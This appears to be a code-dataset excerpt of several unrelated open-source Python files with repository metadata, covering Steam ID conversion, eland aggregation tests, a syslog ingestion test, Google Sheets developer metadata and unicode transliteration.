__all__ = ('EventDispatcher', 'ObjectWithUid', 'Observable')
import kivy._event
__doc__ = kivy._event.__doc__
EventDispatcher = kivy._event.EventDispatcher
ObjectWithUid = kivy._event.ObjectWithUid
Observable = kivy._event.Observable
|
1732da5c5de2be0b45a39be9d08ca45300685c38
|
c07074638db53fbfd31ee761e243b970664c0646
|
/steam/id.py
|
83fbeb0bdc217738b8c0eaa379e8fb60db04f534
|
[
"MIT"
] |
permissive
|
Gobot1234/steam.py
|
4bdd66004d29b0283fb150a2eb910915dbf1d878
|
3075c6065babcd8a67052593d4b31d10c20edabe
|
refs/heads/main
| 2023-08-30T03:59:06.001118
| 2023-08-28T14:18:46
| 2023-08-28T14:18:53
| 233,127,732
| 144
| 40
|
NOASSERTION
| 2023-09-14T13:38:41
| 2020-01-10T20:47:06
|
Python
|
UTF-8
|
Python
| false
| false
| 18,424
|
py
|
id.py
|
"""Licensed under The MIT License (MIT) - Copyright (c) 2020-present James H-B. See LICENSE"""
from __future__ import annotations
import abc
import re
from collections.abc import Callable
from contextlib import nullcontext
from types import GenericAlias
from typing import TYPE_CHECKING, Final, Generic, Literal, cast
import aiohttp
from typing_extensions import TypeVar
from ._const import JSON_LOADS, URL
from .enums import Instance, Type, TypeChar, Universe
from .errors import InvalidID
from .types.id import ID32, ID64, Intable
if TYPE_CHECKING:
from aiohttp import ClientSession
from .types.http import StrOrURL
from .types.user import IndividualID
__all__ = ("ID",)
def parse_id64(
id: Intable,
/,
*,
type: Type | None = None,
universe: Universe | None = None,
instance: Instance | None = None,
) -> ID64:
"""Convert various representations of Steam IDs to its Steam 64-bit ID.
Parameters
----------
id
The ID to convert.
type
The type of the ID.
universe
The universe of the ID.
instance
The instance of the ID.
Examples
--------
.. code:: python
parse_id64(12345)
parse_id64("12345") # account ids
parse_id64(12345, type=steam.Type.Clan) # makes what would be interpreted as a user id into a clan id64
parse_id64(103582791429521412)
parse_id64("103582791429521412") # id64s
parse_id64("STEAM_1:0:2") # id2
parse_id64("[g:1:4]") # id3
Raises
------
:exc:`.InvalidID`
The created 64-bit Steam ID would be invalid.
Returns
-------
The 64-bit Steam ID.
"""
if not id and type is None and universe is None and instance is None:
return ID64(0)
try:
id = int(id)
except ValueError:
# textual input e.g. [g:1:4]
if not isinstance(id, str):
raise InvalidID(id, type, universe, instance, "it cannot be parsed as an int or str") from None
result = ID.from_id2(id) or ID.from_id3(id) or ID.from_invite_code(id)
if result is None:
raise InvalidID(id, type, universe, instance, "it cannot be parsed") from None
return result.id64
else:
# numeric input
if 0 <= id < 2**32: # 32 bit
type = type or Type.Individual
universe = universe or Universe.Public
if instance is None:
instance = Instance.Desktop if type in (Type.Individual, Type.GameServer) else Instance.All
if not (0 <= universe < 1 << 8):
raise InvalidID(id, type, universe, instance, "universe is bigger than 8 bits")
if not (0 <= type < 1 << 4):
raise InvalidID(id, type, universe, instance, "type is bigger than 4 bits")
if not (0 <= instance < 1 << 20):
raise InvalidID(id, type, universe, instance, "instance is bigger than 20 bits")
elif 0 <= id < 2**64: # 64 bit
universe = Universe.try_value((id >> 56) & 0xFF)
type = Type.try_value((id >> 52) & 0xF)
instance = Instance.try_value((id >> 32) & 0xFFFFF)
id &= 0xFFFFFFFF
else:
raise InvalidID(id, type, universe, instance, f"it is too {'large' if id >= 2**64 else 'small'}")
return ID64(universe << 56 | type << 52 | instance << 32 | id)
ID2_REGEX = re.compile(r"STEAM_(?P<universe>\d+):(?P<remainder>[0-1]):(?P<id>\d{1,10})")
ID3_REGEX = re.compile(
(
rf"\[(?P<type>[i{''.join(TypeChar._member_map_)}]):"
rf"(?P<universe>[{min(Universe).value}-{max(Universe).value}]):"
r"(?P<id>[0-9]{1,10})"
r"(:(?P<instance>\d+))?]"
)
)
_INVITE_HEX = "0123456789abcdef"
_INVITE_CUSTOM = "bcdfghjkmnpqrtvw"
_INVITE_VALID = f"{_INVITE_HEX}{_INVITE_CUSTOM}"
_URL_START = r"(?:https?://)?(?:www\.)?"
INVITE_REGEX = re.compile(rf"(?:{_URL_START}(?:s\.team/p/))?(?P<code>[\-{_INVITE_VALID}]{{1,8}})")
def _invite_custom_sub(
s: str,
repl: Callable[[re.Match[str]], str] = lambda m, map=dict(zip(_INVITE_CUSTOM, _INVITE_HEX)): map[m.group()],
pattern: re.Pattern[str] = re.compile(f"[{_INVITE_CUSTOM}]"),
/,
) -> str:
return pattern.sub(repl, s)
def _invite_hex_sub(
s: str,
repl: Callable[[re.Match[str]], str] = lambda m, map=dict(zip(_INVITE_HEX, _INVITE_CUSTOM)): map[m.group()],
pattern: re.Pattern[str] = re.compile(f"[{_INVITE_HEX}]"),
/,
) -> str:
return pattern.sub(repl, s)
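# The two substitutions above are inverses over their alphabets. For example,
# _invite_custom_sub("cvdgb") == "1e240" and int("1e240", 16) == 123456, so the
# invite code ``cv-dgb`` used in the docstrings below maps to account id 123456.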
USER_URL_PATHS = frozenset({"id", "profiles", "user"})
CLAN_URL_PATHS = frozenset({"gid", "groups", "app", "games"})
URL_REGEX = re.compile(
rf"{_URL_START}(?P<clean_url>steamcommunity\.com/(?P<type>{'|'.join(USER_URL_PATHS | CLAN_URL_PATHS)})/(?P<value>.+))"
)
USER_ID64_FROM_URL_REGEX = re.compile(r"g_rgProfileData\s*=\s*(?P<json>{.*?});\s*")
CLAN_ID64_FROM_URL_REGEX = re.compile(r"OpenGroupChat\(\s*'(?P<steamid>\d+)'\s*\)")
async def id64_from_url(url: StrOrURL, /, session: aiohttp.ClientSession | None = None) -> ID64 | None:
"""Takes a Steam Community url and returns 64-bit Steam ID or ``None``.
Notes
-----
- Each call makes a http request to https://steamcommunity.com.
- Example URLs:
https://steamcommunity.com/gid/[g:1:4]
https://steamcommunity.com/gid/103582791429521412
https://steamcommunity.com/groups/Valve
https://steamcommunity.com/profiles/[U:1:12]
https://steamcommunity.com/profiles/76561197960265740
https://steamcommunity.com/id/johnc
https://steamcommunity.com/user/r
https://steamcommunity.com/app/570
Parameters
----------
url
The Steam community url.
session
The session to make the request with. If this parameter is omitted a new one is generated.
Returns
-------
The found 64-bit ID or ``None`` if ``https://steamcommunity.com`` is down or no matching account is found.
"""
if not (search := URL_REGEX.match(str(url))):
return None
async with (
aiohttp.ClientSession() if session is None else nullcontext(session) as session,
session.get(f"https://{search['clean_url']}") as r,
):
text = await r.text()
if search["type"] in USER_URL_PATHS:
data = JSON_LOADS(match["json"]) if (match := USER_ID64_FROM_URL_REGEX.search(text)) else None
else:
data = CLAN_ID64_FROM_URL_REGEX.search(text)
return ID64(int(data["steamid"])) if data else None
_ID64_TO_ID32: Final = cast(Callable[[int], ID32], 0xFFFFFFFF.__and__)
TypeT = TypeVar("TypeT", bound=Type, default=Type, covariant=True)
class ID(Generic[TypeT], metaclass=abc.ABCMeta):
"""Convert a Steam ID between its various representations.
.. container:: operations
.. describe:: x == y
Checks if two IDs are equal.
.. describe:: hash(x)
Returns the hash of the ID.
.. describe:: str(x)
Returns the string representation of :attr:`id64`.
.. describe:: int(x)
Returns the :attr:`id64` of the ID.
.. describe:: format(x, format_spec)
Formats the ID using the given format spec.
Prefixes of ``32``, ``64`` can be used to specify which of :attr:`id` or :attr:`id64` to use.
Anything after the prefix is passed to :func:`format`.
E.g.
.. code-block:: pycon
>>> format(steam_id, "64x") # formats the `id64` as a hex string
"11000010264339c"
>>> format(steam_id, "32b") # formats the `id` as binary
"10011001000011001110011100"
>>> f"{steam_id:32b}" # same as above
Parameters
----------
id
The ID to convert.
type
The type of the ID.
universe
The universe of the ID.
instance
The instance of the ID.
"""
# format of a 64-bit steam ID:
# 0b0000000100010000000000000000000100010001001001110100110011000010
# └───┰──┘└─┰┘└─────────┰────────┘└──────────────┰───────────────┘
# │ │ │ │
# universe └ type └ instance └ account id
# (8 bits) (4 bits) (20 bits) (32 bits)
# Universe Type InstanceFlag ID32
# Public Individual All 287788226
__slots__ = ("id64", "__weakref__")
__class_getitem__ = classmethod(
GenericAlias
    )  # use types.GenericAlias rather than typing._GenericAlias for its attribute forwarding
def __init__(
self,
id: Intable,
*,
type: TypeT | None = None,
universe: Universe | None = None,
instance: Instance | None = None,
):
self.id64: Final = parse_id64(id, type=type, universe=universe, instance=instance)
"""The Steam ID's 64-bit ID."""
def __int__(self) -> ID64:
return self.id64
def __eq__(self, other: object) -> bool:
return isinstance(other, ID) and self.id64 == other.id64
def __str__(self) -> str:
return str(self.id64)
def __hash__(self) -> int:
return hash(self.id64)
def __repr__(self) -> str:
return f"{self.__class__.__name__}(id={self.id}, type={self.type!r}, universe={self.universe!r}, instance={self.instance!r})"
def __format__(self, format_spec: str, /) -> str:
match format_spec[:2]:
case "64" | "":
return format(self.id64, format_spec[2:])
case "32":
return format(self.id, format_spec[2:])
case _:
raise ValueError(f"Unknown format specifier {format_spec!r}")
@property
def universe(self) -> Universe:
"""The Steam universe of the ID."""
return Universe.try_value((self.id64 >> 56) & 0xFF)
@property
def type(self) -> TypeT:
"""The Steam type of the ID."""
return cast(TypeT, Type.try_value((self.id64 >> 52) & 0xF))
@property
def instance(self) -> Instance:
"""The instance of the ID."""
return Instance.try_value((self.id64 >> 32) & 0xFFFFF)
@property
def id(self, _ID64_TO_ID32: Callable[[ID64], ID32] = _ID64_TO_ID32, /) -> ID32:
"""The Steam ID's 32-bit ID."""
return _ID64_TO_ID32(self.id64)
@property
def id2(self) -> str:
"""The Steam ID's ID 2.
e.g ``STEAM_1:0:1234``.
"""
return f"STEAM_{self.universe.value}:{self.id % 2}:{self.id >> 1}"
@property
def id2_zero(self) -> str:
"""The Steam ID's ID 2 accounted for bugged GoldSrc and Orange Box games.
Note
----
        In these games the account's :attr:`universe` (``1`` for :attr:`.Universe.Public`) should be the ``X``
        component of ``STEAM_X:0:1234``; however, this was bugged and the value of ``X`` was always ``0``.
e.g ``STEAM_0:0:1234``.
"""
return self.id2.replace("_1", "_0")
@property
def id3(self) -> str:
"""The Steam ID's ID 3.
e.g ``[U:1:1234]``.
"""
type_char = TypeChar(self.type).name
instance = None
match self.type:
case Type.AnonGameServer | Type.Multiseat:
instance = self.instance
case Type.Individual:
if self.instance != Instance.Desktop:
instance = self.instance
case Type.Chat:
if self.instance & Instance.ChatClan > 0:
type_char = "c"
elif self.instance & Instance.ChatLobby > 0:
type_char = "L"
else:
type_char = "T"
return f"[{type_char}:{self.universe.value}:{self.id}{f':{instance.value}' if instance is not None else ''}]"
# @property
# @overload
# def invite_code(self: ID[Type.Individual]) -> str:
# ...
#
# @property
# @overload
# def invite_code(self: ID[~Type.Individual]) -> None:
# ...
@property
def invite_code(self) -> str | None:
"""The Steam ID's invite code in the s.team invite code format.
e.g. ``cv-dgb``.
"""
if self.type == Type.Individual and self.is_valid():
invite_code = _invite_hex_sub(f"{self:32x}")
split_idx = len(invite_code) // 2
return invite_code if split_idx == 0 else f"{invite_code[:split_idx]}-{invite_code[split_idx:]}"
# @property
# @overload
# def invite_url(self: ID[Type.Individual]) -> str:
# ...
#
# @property
# @overload
# def invite_url(self: ID[~Type.Individual]) -> None:
# ...
#
@property
def invite_url(self) -> str | None:
"""The Steam ID's full invite code URL.
e.g ``https://s.team/p/cv-dgb``.
"""
code = self.invite_code
return f"https://s.team/p/{code}" if code else None
# @property
# @overload
# def community_url(self: ID[Type.Individual | Type.Clan]) -> str:
# ...
#
# @property
# @overload
# def community_url(self: ID[~(Type.Individual | Type.Clan)]) -> None:
# ...
@property
def community_url(self) -> str | None:
"""The Steam ID's community url if it is a :attr:`.Type.Individual` or :attr:`.Type.Clan`.
e.g ``https://steamcommunity.com/profiles/123456789`` or ``https://steamcommunity.com/gid/123456789``.
"""
match self.type:
case Type.Individual:
return str(URL.COMMUNITY / f"profiles/{self.id64}")
case Type.Clan:
return str(URL.COMMUNITY / f"gid/{self.id64}")
case _:
return None
def is_valid(self) -> bool:
"""Whether this Steam ID is valid.
A Steam ID is currently considered valid if:
- It is in ``(0, 2**64)``
- :attr:`universe` is in ``(Invalid, Dev]``
- :attr:`type` is in ``(Invalid, AnonUser]``
- If :attr:`type` is :attr:`.Type.Individual`:
- :attr:`id` is non-zero
- :attr:`instance` is in ``[All, Web]``
- If :attr:`type` is :attr:`.Type.Clan`:
- :attr:`id` is non-zero
- :attr:`instance` is ``All``.
- If :attr:`type` is :attr:`.Type.GameServer`:
- :attr:`id` is non-zero
"""
if not (0 < self.id64 < 2**64):
return False # this shouldn't ever happen unless someone messes around with id64 but w/e
if not (Universe.Invalid < self.universe <= Universe.Dev):
return False
if not (Type.Invalid < self.type <= Type.AnonUser):
return False
match self.type:
case Type.Individual:
return self.id != 0 and Instance.All <= self.instance <= Instance.Web
case Type.Clan:
return self.id != 0 and self.instance == Instance.All
case Type.GameServer:
return self.id != 0
return True
@staticmethod
def from_id2(value: str, /) -> IndividualID | None:
"""Create an ID from a user's :attr:`id2`.
Parameters
----------
value
The ID2 e.g. ``STEAM_1:0:1234``.
Note
----
The universe will be set to :attr:`Universe.Public` if it's ``0``. See :attr:`ID.id2_zero`.
"""
if (match := ID2_REGEX.fullmatch(value)) is None:
return None
id = (int(match["id"]) << 1) | int(match["remainder"])
universe = (
int(match["universe"])
or 1 # games before orange box used to incorrectly display universe as 0, we support that
)
return ID(id, type=Type.Individual, universe=Universe.try_value(universe), instance=Instance.Desktop)
@staticmethod
def from_id3(value: str, /) -> ID | None:
"""Create an ID from an SteamID's :attr:`id3`.
Parameters
----------
value
The ID3 e.g. ``[U:1:1234]``.
"""
if (match := ID3_REGEX.fullmatch(value)) is None:
return None
id = ID32(match["id"])
universe = Universe.try_value(int(match["universe"]))
type_char = TypeChar[match["type"].replace("i", "I")]
if instance_ := match["instance"]:
instance = Instance.try_value(int(instance_))
else:
instance = Instance.All
# we can't use simple match because that uses the int.__eq__ which won't work for L, c and T
match type_char.name:
case TypeChar.g.name | TypeChar.T.name:
instance = Instance.All
case TypeChar.L.name:
instance = Instance.ChatLobby
case TypeChar.c.name:
instance = Instance.ChatClan
case TypeChar.G.name | TypeChar.U.name:
instance = Instance.Desktop
return ID(id, type=type_char.value, universe=universe, instance=instance)
@staticmethod
def from_invite_code(value: str, /) -> ID[Literal[Type.Individual]] | None:
"""Create an ID from a user's :attr:`invite_code`.
Parameters
----------
value
The invite code e.g. ``cv-dgb``
"""
if (search := INVITE_REGEX.fullmatch(value)) is None:
return None
code = search["code"].replace("-", "")
        id = ID32(int(_invite_custom_sub(code), 16))
if 0 < id < 2**32:
return ID(id, type=Type.Individual, universe=Universe.Public, instance=Instance.Desktop)
@staticmethod
async def from_url(
url: StrOrURL, /, session: ClientSession | None = None
) -> ID[Literal[Type.Individual, Type.Clan]] | None:
"""A helper function creates a Steam ID instance from a Steam community url.
Note
----
See :func:`id64_from_url` for the full parameter list.
"""
id64 = await id64_from_url(url, session)
if id64:
return ID[Literal[Type.Individual, Type.Clan]](id64)
ID_ZERO: Final = ID[Literal[Type.Individual]](0, type=Type.Individual)
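# Hedged usage sketch of the class above, using the worked example from the
# comments (account id 123456 with the Individual/Public/Desktop defaults):
#
#     user = ID(123456)
#     assert user.id2 == "STEAM_1:0:61728"
#     assert user.id3 == "[U:1:123456]"
#     assert user.invite_code == "cv-dgb"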
|
98b77b3bcde651fe70dcc9a02e63dcb9a4145bd8
|
2b2b5e2a28038b8e2dea5bbec0f833cabfa0c256
|
/tests/dataframe/test_aggs_pytest.py
|
87ef84e90bbee3d80368cc347d603497e6f667bb
|
[
"Apache-2.0",
"MIT",
"BSD-3-Clause"
] |
permissive
|
elastic/eland
|
09b321d500c31abb04673a17bc9ea32f13d3358e
|
95864a9ace67337b863ebeb65ded808cf5ba03b3
|
refs/heads/main
| 2023-09-01T18:13:38.645147
| 2023-08-31T09:34:36
| 2023-08-31T09:34:36
| 191,316,757
| 524
| 95
|
Apache-2.0
| 2023-09-14T19:31:16
| 2019-06-11T07:24:06
|
Python
|
UTF-8
|
Python
| false
| false
| 5,029
|
py
|
test_aggs_pytest.py
|
# Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# File called _pytest for PyCharm compatibility
import numpy as np
import pytest
from pandas.testing import assert_frame_equal, assert_series_equal
from tests.common import TestData
class TestDataFrameAggs(TestData):
def test_basic_aggs(self):
pd_flights = self.pd_flights()
ed_flights = self.ed_flights()
pd_sum_min = pd_flights.select_dtypes(include=[np.number]).agg(["sum", "min"])
ed_sum_min = ed_flights.select_dtypes(include=[np.number]).agg(
["sum", "min"], numeric_only=True
)
# Eland returns all float values for all metric aggs, pandas can return int
# TODO - investigate this more
pd_sum_min = pd_sum_min.astype("float64")
assert_frame_equal(pd_sum_min, ed_sum_min, check_exact=False)
pd_sum_min_std = pd_flights.select_dtypes(include=[np.number]).agg(
["sum", "min", "std"]
)
ed_sum_min_std = ed_flights.select_dtypes(include=[np.number]).agg(
["sum", "min", "std"], numeric_only=True
)
print(pd_sum_min_std.dtypes)
print(ed_sum_min_std.dtypes)
assert_frame_equal(pd_sum_min_std, ed_sum_min_std, check_exact=False, rtol=True)
def test_terms_aggs(self):
pd_flights = self.pd_flights()
ed_flights = self.ed_flights()
pd_sum_min = pd_flights.select_dtypes(include=[np.number]).agg(["sum", "min"])
ed_sum_min = ed_flights.select_dtypes(include=[np.number]).agg(
["sum", "min"], numeric_only=True
)
# Eland returns all float values for all metric aggs, pandas can return int
# TODO - investigate this more
pd_sum_min = pd_sum_min.astype("float64")
assert_frame_equal(pd_sum_min, ed_sum_min, check_exact=False)
pd_sum_min_std = pd_flights.select_dtypes(include=[np.number]).agg(
["sum", "min", "std"]
)
ed_sum_min_std = ed_flights.select_dtypes(include=[np.number]).agg(
["sum", "min", "std"], numeric_only=True
)
print(pd_sum_min_std.dtypes)
print(ed_sum_min_std.dtypes)
assert_frame_equal(pd_sum_min_std, ed_sum_min_std, check_exact=False, rtol=True)
def test_aggs_median_var(self):
pd_ecommerce = self.pd_ecommerce()
ed_ecommerce = self.ed_ecommerce()
pd_aggs = pd_ecommerce[
["taxful_total_price", "taxless_total_price", "total_quantity"]
].agg(["median", "var"])
ed_aggs = ed_ecommerce[
["taxful_total_price", "taxless_total_price", "total_quantity"]
].agg(["median", "var"], numeric_only=True)
print(pd_aggs, pd_aggs.dtypes)
print(ed_aggs, ed_aggs.dtypes)
# Eland returns all float values for all metric aggs, pandas can return int
# TODO - investigate this more
pd_aggs = pd_aggs.astype("float64")
assert_frame_equal(pd_aggs, ed_aggs, check_exact=False, rtol=2)
# If Aggregate is given a string then series is returned.
@pytest.mark.parametrize("agg", ["mean", "min", "max"])
def test_terms_aggs_series(self, agg):
pd_flights = self.pd_flights()
ed_flights = self.ed_flights()
pd_sum_min_std = pd_flights.select_dtypes(include=[np.number]).agg(agg)
ed_sum_min_std = ed_flights.select_dtypes(include=[np.number]).agg(
agg, numeric_only=True
)
assert_series_equal(pd_sum_min_std, ed_sum_min_std)
def test_terms_aggs_series_with_single_list_agg(self):
# aggs list with single agg should return dataframe.
pd_flights = self.pd_flights()
ed_flights = self.ed_flights()
pd_sum_min = pd_flights.select_dtypes(include=[np.number]).agg(["mean"])
ed_sum_min = ed_flights.select_dtypes(include=[np.number]).agg(
["mean"], numeric_only=True
)
assert_frame_equal(pd_sum_min, ed_sum_min)
# If Wrong Aggregate value is given.
def test_terms_wrongaggs(self):
ed_flights = self.ed_flights()[["FlightDelayMin"]]
match = "('abc', ' not currently implemented')"
with pytest.raises(NotImplementedError, match=match):
ed_flights.select_dtypes(include=[np.number]).agg("abc")
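# For reference, the core pattern exercised throughout these tests (ed_flights
# is an eland DataFrame backed by the flights test index via tests.common.TestData):
#
#     ed_flights.select_dtypes(include=[np.number]).agg(["sum", "min"], numeric_only=True)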
|
4b8704930c531457bc677bdb82e8a90601c156d5
|
6bc58f290bc3ecd1f4d2a492f0abc5fd4b8ff9c0
|
/tests/test_cylance_protect.py
|
f300e72332b26fa65da11489515524da2d4fb850
|
[
"Apache-2.0",
"CC0-1.0",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-generic-cla",
"BSD-2-Clause"
] |
permissive
|
splunk/splunk-connect-for-syslog
|
c5821e025ef1b5d1312a6ac71b822262f560aa99
|
472f0b7a0bcbb29cb00a141e4fe4aa6193c49fde
|
refs/heads/main
| 2023-08-25T03:57:40.245846
| 2023-08-21T08:55:12
| 2023-08-21T08:55:12
| 194,185,530
| 188
| 149
|
Apache-2.0
| 2023-09-14T18:31:04
| 2019-06-28T01:27:07
|
Python
|
UTF-8
|
Python
| false
| false
| 1,882
|
py
|
test_cylance_protect.py
|
# Copyright 2019 Splunk, Inc.
#
# Use of this source code is governed by a BSD-2-clause-style
# license that can be found in the LICENSE-BSD2 file or at
# https://opensource.org/licenses/BSD-2-Clause
import random
from jinja2 import Environment
from .sendmessage import *
from .splunkutils import *
from .timeutils import *
env = Environment()
# <46>1 2021-12-08T21:07:19.100000Z sysloghost CylancePROTECT - - - Event Type: ExploitAttempt, Event Name: none, Device Name: DEVICENAME, IP Address: (), Action: None, Process ID: 72724, Process Name: C:\Program Files (x86)\Medcon\Medcon Common\Dicom2Avi_App.exe, User Name: tcsadmin, Violation Type: Stack Pivot, Zone Names: (Windows Server 2008), Device Id: a603a6e8-cac7-4d06-970c-24671e5af6cc, Policy Name: Servers Complete Policy
def test_cylance_exploit(record_property, setup_wordlist, setup_splunk, setup_sc4s):
host = "{}-{}".format(random.choice(setup_wordlist), random.choice(setup_wordlist))
dt = datetime.datetime.now()
iso, bsd, time, date, tzoffset, tzname, epoch = time_operations(dt)
    # Tune time functions for Cylance
epoch = epoch[:-3]
mt = env.from_string(
"{{ mark }} {{ iso }} {{ host }} CylancePROTECT - - - Event Type: ExploitAttempt, Event Name: none, Device Name: DEVICENAME"
)
message = mt.render(mark="<134>1", host=host, bsd=bsd, iso=iso)
sendsingle(message, setup_sc4s[0], setup_sc4s[1][514])
st = env.from_string(
'search _time={{ epoch }} index=epintel host="{{ host }}" sourcetype="syslog_exploit"'
)
search = st.render(
epoch=epoch, bsd=bsd, host=host, date=date, time=time, tzoffset=tzoffset
)
resultCount, eventCount = splunk_single(setup_splunk, search)
record_property("host", host)
record_property("resultCount", resultCount)
record_property("message", message)
assert resultCount == 1
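# For reference, a hedged sketch of the rendered message for a host of
# "alpha-bravo" (the iso timestamp is generated at run time; a fixed one is
# shown for illustration):
#
#     <134>1 2021-12-08T21:07:19.100000Z alpha-bravo CylancePROTECT - - - Event Type: ExploitAttempt, Event Name: none, Device Name: DEVICENAME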
|
54341f0f4f234ac4c68cf1654f85ec1e5f952e85
|
38d76993b5b6337d0d8a8dcb4b1e4a84f8899d6d
|
/pygsheets/developer_metadata.py
|
aa71f4f04330381ba450075b83c0aa3f9b585a50
|
[
"MIT"
] |
permissive
|
nithinmurali/pygsheets
|
b094c113c68bbdf88438b2cb6088d2d9a8fca107
|
df688a3252263dacc057ff118b2c58968bf0246e
|
refs/heads/staging
| 2023-09-04T03:02:39.527120
| 2023-05-10T16:17:15
| 2023-05-10T16:17:15
| 60,546,709
| 1,530
| 259
|
NOASSERTION
| 2023-08-21T06:53:00
| 2016-06-06T17:20:44
|
Python
|
UTF-8
|
Python
| false
| false
| 4,853
|
py
|
developer_metadata.py
|
# -*- coding: utf-8 -*-
class DeveloperMetadataLookupDataFilter:
"""Class for filtering developer metadata queries
This class only supports filtering for metadata on a whole spreadsheet or
worksheet.
:param spreadsheet_id: Spreadsheet id to filter on (leave at None to search all metadata)
:param sheet_id: Worksheet id to filter on (leave at None for whole-spreadsheet metadata)
:param meta_id: Developer metadata id to filter on (optional)
:param meta_key: Developer metadata key to filter on (optional)
:param meta_value: Developer metadata value to filter on (optional)
"""
def __init__(self, spreadsheet_id=None, sheet_id=None, meta_id=None, meta_key=None, meta_value=None):
self.spreadsheet_id = spreadsheet_id
self.sheet_id = sheet_id
self.meta_filters = {
"metadataId": meta_id,
"metadataKey": meta_key,
"metadataValue": meta_value,
"metadataLocation": self.location
}
def to_json(self):
lookup = dict((k, v) for k, v in self.meta_filters.items() if v is not None)
return {"developerMetadataLookup": lookup}
@property
    def location(self):
        # Prefer the more specific worksheet location; fall back to
        # whole-spreadsheet metadata when only the spreadsheet id is given.
        if self.sheet_id is not None:
            return {"sheetId": self.sheet_id}
        if self.spreadsheet_id is not None:
            return {"spreadsheet": True}
        return None
class DeveloperMetadata(object):
@classmethod
def new(cls, key, value, client, spreadsheet_id, sheet_id=None):
"""Create a new developer metadata entry
Will return None when in batch mode, otherwise will return a DeveloperMetadata object
        :param key: The key of the new developer metadata entry to create
        :param value: The value of the new developer metadata entry to create
        :param client: The client responsible for connecting the sheet with the remote.
:param spreadsheet_id: The id of the spreadsheet where metadata will be created.
:param sheet_id: The id of the worksheet where the metadata will be created (optional)
"""
filter = DeveloperMetadataLookupDataFilter(spreadsheet_id, sheet_id)
meta_id = client.sheet.developer_metadata_create(spreadsheet_id, key, value, filter.location)
if meta_id is None:
# we're in batch mode
return
return cls(meta_id, key, value, client, spreadsheet_id, sheet_id)
def __init__(self, meta_id, key, value, client, spreadsheet_id, sheet_id=None):
"""Create a new developer metadata entry
Will return None when in batch mode, otherwise will return a DeveloperMetadata object
:param meta_id: The id of the developer metadata entry this represents
:param key: They key of the new developer metadata entry this represents
:param value: They value of the new developer metadata entry this represents
:param client: The client which is responsible to connect the sheet with the remote.
:param spreadsheet_id: The id of the spreadsheet where metadata is stored
:param sheet_id: The id of the worksheet where the metadata is stored (optional)
"""
self._id = meta_id
self.key = key
self.value = value
self.client = client
self.spreadsheet_id = spreadsheet_id
self.sheet_id = sheet_id
self._filter = DeveloperMetadataLookupDataFilter(self.spreadsheet_id,
self.sheet_id, self.id)
def __repr__(self):
return "<DeveloperMetadata id={} key={} value={}>".format(repr(self.id),
repr(self.key),
repr(self.value))
@property
def id(self):
return self._id
def fetch(self):
"""Refresh this developer metadata entry from the spreadsheet"""
response = self.client.sheet.developer_metadata_get(self.spreadsheet_id, self.id)
self.key = response["metadataKey"]
self.value = response["metadataValue"]
def update(self):
"""Push the current local values to the spreadsheet"""
self.client.sheet.developer_metadata_update(self.spreadsheet_id, self.key,
self.value, self._filter.location,
self._filter.to_json())
def delete(self):
"""Delete this developer metadata entry"""
self.client.sheet.developer_metadata_delete(self.spreadsheet_id,
self._filter.to_json())
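# Hedged usage sketch (the spreadsheet id is a placeholder; ``client`` would be
# the pygsheets client normally obtained via pygsheets.authorize()):
#
#     meta = DeveloperMetadata.new("stage", "prod", client, "<spreadsheet id>")
#     meta.value = "dev"
#     meta.update()  # push the local change to the sheet
#     meta.delete()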
|
9e610f63625f3a5c22b39b8ddef12d5b82e2bd30
|
cad91ae76d2746a6c28ddda0f33a58f9d461378f
|
/PyTorch/SpeechSynthesis/Tacotron2/tacotron2/text/unidecoder/__init__.py
|
e2e76516561849f9e140a8610d9ada6e832cad64
|
[
"BSD-3-Clause",
"MIT"
] |
permissive
|
NVIDIA/DeepLearningExamples
|
fe677521e7e2a16e3cb0b77e358f9aab72f8c11a
|
a5388a45f71a949639b35cc5b990bd130d2d8164
|
refs/heads/master
| 2023-08-31T20:57:08.798455
| 2023-08-23T10:09:12
| 2023-08-23T10:09:12
| 131,881,622
| 11,838
| 3,124
| null | 2023-08-28T16:57:33
| 2018-05-02T17:04:05
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,621
|
py
|
__init__.py
|
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import io
import warnings
from .homoglyphs import homoglyphs
from .replacements import replacements
_replacements = {uni: asc for uni, asc in replacements}
_homoglyphs = {g: asc for asc, glyphs in homoglyphs.items() for g in glyphs}
def unidecoder(s, homoglyphs=False):
"""Transliterate unicode
Args:
s (str): unicode string
homoglyphs (bool): prioritize translating to homoglyphs
"""
warned = False # Once per utterance
ret = ''
for u in s:
if ord(u) < 127:
a = u
elif homoglyphs:
a = _homoglyphs.get(u, _replacements.get(u, None))
else:
a = _replacements.get(u, _homoglyphs.get(u, None))
if a is None:
if not warned:
warnings.warn(f'Unexpected character {u}: '
'please revise your text cleaning rules.',
stacklevel=10**6)
warned = True
else:
ret += a
return ret
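# Hedged usage sketch; the exact outputs depend on the bundled replacement and
# homoglyph tables:
#
#     unidecoder("naïve café")              # expected: "naive cafe"
#     unidecoder("Αlpha", homoglyphs=True)  # Greek capital alpha -> "Alpha"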
|
b290fb490048d4dbc63779f03b394aa9f2f7bd0a
|
417e21443179541fcf48fde9407b3fd3f58d4406
|
/mindmeld/models/evaluation.py
|
3ebd71d761db3f0181b2febaf67c5c81f78bb1fa
|
[
"Apache-2.0"
] |
permissive
|
cisco/mindmeld
|
549e23eb6ee1385d2d1729ca532f1265d954276f
|
bd3547d5c1bd092dbd4a64a90528dfc2e2b3844a
|
refs/heads/master
| 2023-08-28T07:34:09.771290
| 2023-01-31T18:12:37
| 2023-01-31T18:12:37
| 177,415,822
| 671
| 194
|
Apache-2.0
| 2023-03-15T06:53:24
